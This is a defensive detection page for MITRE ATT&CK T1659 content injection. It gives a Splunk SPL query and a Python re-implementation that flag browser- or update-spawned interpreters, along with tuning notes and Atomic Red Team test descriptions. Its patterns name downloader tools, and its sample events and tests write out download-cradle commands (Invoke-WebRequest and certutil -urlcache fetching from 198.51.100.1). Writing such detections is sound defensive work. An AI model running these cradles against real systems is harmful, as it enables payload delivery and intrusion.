T1659 Splunk · SPL

Detect Content Injection in Splunk

This detection identifies adversary content injection attacks where malicious payloads are delivered by manipulating in-transit network traffic between victims and legitimate online services. Rather than hosting payloads on attacker-controlled websites, adversaries operating at a compromised network position—such as a compromised ISP or routing infrastructure—intercept and modify DNS, HTTP, or SMB responses before they reach the victim. The detection focuses on three behavioral indicators: suspicious interpreter or downloader processes spawned by web browsers or Windows Update components following unencrypted HTTP connections to known update domains; HTTP connections to Microsoft update infrastructure over plaintext port 80 (which should exclusively use HTTPS/443); and DNS resolutions of trusted domains returning IP addresses outside expected authoritative ranges. Known threat activity consistent with this technique includes MoustachedBouncer injecting fake Windows Update pages to deploy malware against diplomatic targets in Belarus, and the Disco implant achieving initial access through injected DNS, HTTP, and SMB replies that redirected victims to attacker-controlled download servers.

MITRE ATT&CK

Tactic: Initial Access, Command and Control
Technique: T1659 Content Injection
Canonical reference: https://attack.mitre.org/techniques/T1659/

SPL Detection Query

Splunk (SPL)

```spl
index=* sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| eval process=lower(Image)
| eval parent=lower(ParentImage)
| eval cmdline=lower(CommandLine)
| eval workdir=lower(CurrentDirectory)
| where match(parent, "svchost\.exe|wuauclt\.exe|usoclient\.exe|chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe")
| where match(process, "wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|certutil\.exe|bitsadmin\.exe|msiexec\.exe|powershell\.exe|cmd\.exe")
| where match(cmdline, "http://|ftp://|invoke-webrequest|wget |curl |bitsadmin|/transfer")
    OR match(cmdline, "-enc |-encodedcommand ")
    OR like(workdir, "%temp%") OR like(workdir, "%downloads%")
| eval risk_score=case(
    match(parent, "svchost\.exe|wuauclt\.exe|usoclient\.exe") AND match(cmdline, "http://"), 95,
    match(cmdline, "-enc |-encodedcommand "), 90,
    match(parent, "chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe") AND match(process, "powershell\.exe|cmd\.exe"), 85,
    like(workdir, "%temp%") OR like(workdir, "%downloads%"), 75,
    true(), 65
)
| table _time, host, User, process, parent, cmdline, workdir, Hashes, risk_score
| sort -risk_score, -_time
```

Severity: high · Confidence: medium

Detects Sysmon Event ID 1 (Process Create) where a browser or Windows Update process spawns a scripting interpreter or downloader binary with command-line indicators of HTTP-based payload retrieval, encoded commands, or execution from temp/downloads directories. Risk scoring prioritizes update-service parents with HTTP download patterns (score 95) as these most closely match MoustachedBouncer's TTP, followed by encoded PowerShell (90) and browser-spawned interpreters (85).
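The matching and scoring logic above, re-expressed in Python as an added example (not code from the original page or from the Splunk rule itself) so the detection can be unit-tested offline before deployment: score_event applies the same parent, process, command-line and working-directory filters and the same case() ordering to one Sysmon Event ID 1 record, and SAMPLE_EVENTS holds constructed records, including one the query deliberately does not match.

```python
import re

# Added example (not from the page): the SPL rule's where clauses and risk_score case()
# re-expressed in Python so the detection logic can be unit-tested offline.
FIELDS = ("Image", "ParentImage", "CommandLine", "CurrentDirectory")
PARENTS = re.compile(r"svchost\.exe|wuauclt\.exe|usoclient\.exe|chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe")
UPDATE_PARENTS = re.compile(r"svchost\.exe|wuauclt\.exe|usoclient\.exe")
BROWSER_PARENTS = re.compile(r"chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe")
PROCESSES = re.compile(r"wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|"
                       r"certutil\.exe|bitsadmin\.exe|msiexec\.exe|powershell\.exe|cmd\.exe")
SHELLS = re.compile(r"powershell\.exe|cmd\.exe")
DOWNLOAD = re.compile(r"http://|ftp://|invoke-webrequest|wget |curl |bitsadmin|/transfer")
ENCODED = re.compile(r"-enc |-encodedcommand ")

def score_event(event):
    """risk_score for one Sysmon Event ID 1 record, or None if the where clauses drop it."""
    process, parent, cmdline, workdir = (event.get(f, "").lower() for f in FIELDS)
    staged = "temp" in workdir or "downloads" in workdir  # like(workdir, "%temp%") OR "%downloads%"
    if not (PARENTS.search(parent) and PROCESSES.search(process)):
        return None
    if not (DOWNLOAD.search(cmdline) or ENCODED.search(cmdline) or staged):
        return None
    # case() returns the first true branch, so the order here mirrors the SPL exactly.
    if UPDATE_PARENTS.search(parent) and "http://" in cmdline:
        return 95
    if ENCODED.search(cmdline):
        return 90
    if BROWSER_PARENTS.search(parent) and SHELLS.search(process):
        return 85
    if staged:
        return 75
    return 65

# Constructed sample records (not real telemetry), values in FIELDS order; 198.51.100.1
# is the documentation-range address the page's test descriptions use.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = {name: dict(zip(FIELDS, values)) for name, values in {
    "update_service_http": (PS, r"C:\Windows\System32\svchost.exe",
        "powershell.exe Invoke-WebRequest http://198.51.100.1/update.exe", r"C:\Windows\System32"),
    "browser_encoded": (PS, r"C:\Program Files\Microsoft\Edge\msedge.exe",
        "powershell.exe -enc <base64-placeholder>", r"C:\Users\alice"),
    "browser_certutil_downloads": (r"C:\Windows\System32\certutil.exe", r"C:\Program Files\Google\Chrome\chrome.exe",
        "certutil.exe -urlcache -split -f http://198.51.100.1/a.dat a.dat", r"C:\Users\alice\Downloads"),
    "explorer_parent_not_matched": (PS, r"C:\Windows\explorer.exe",
        "powershell.exe Invoke-WebRequest http://198.51.100.1/x", r"C:\Users\alice"),
}.items()}

def score_all(events=SAMPLE_EVENTS):
    return {name: score_event(ev) for name, ev in events.items()}
```

Two tuning points the samples make visible: the query keys on the immediate parent, so a powershell.exe whose parent is cmd.exe (the chain in Test 2 below) is not matched on its own, and like(workdir, "%temp%") is a substring test, so paths such as ...\Templates also score.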

Data Sources

Sysmon

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Enterprise software deployment systems (SCCM, Intune) that trigger PowerShell scripts through svchost.exe as part of legitimate patch management workflows
  • Browser extensions or enterprise browser management tools that spawn cmd.exe or PowerShell for configuration or telemetry purposes
  • Legitimate update agents that use HTTP endpoints on internal corporate networks or proxy servers for patching, generating the HTTP download pattern without malicious intent
  • Security tools and EDR agents that spawn child processes with Base64-encoded arguments for monitoring or collection purposes, matching the -enc command-line filter
Testing Methodology

Validate this detection against the three Atomic Red Team tests below. Each test lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Simulate DNS Injection via Hosts File Redirect of Update Domain

     Expected signal: Sysmon Event ID 22 (DNS Query) showing download.microsoft.com with QueryResults containing 198.51.100.1; Sysmon Event ID 1 for nslookup.exe process creation with a command line including 'download.microsoft.com'

  2. Test 2: Simulated Injected Payload Execution from Browser-Spawned Process

     Expected signal: Sysmon Event ID 1 for cmd.exe spawning powershell.exe with Invoke-WebRequest and an http:// URI in CommandLine; Sysmon Event ID 3 showing powershell.exe attempting a TCP connection to 198.51.100.1:80; working directory will be the user profile or a temp path

  3. Test 3: LOLBin Certutil Download Cradle from Temp Path

     Expected signal: Sysmon Event ID 1 for certutil_test.exe (copied certutil) executing from the %TEMP% path with -urlcache and an http:// URL in CommandLine; Sysmon Event ID 3 for an HTTP connection attempt from the temp-path binary to 198.51.100.1:80; Sysmon Event ID 11 for the file copy creating certutil_test.exe in temp
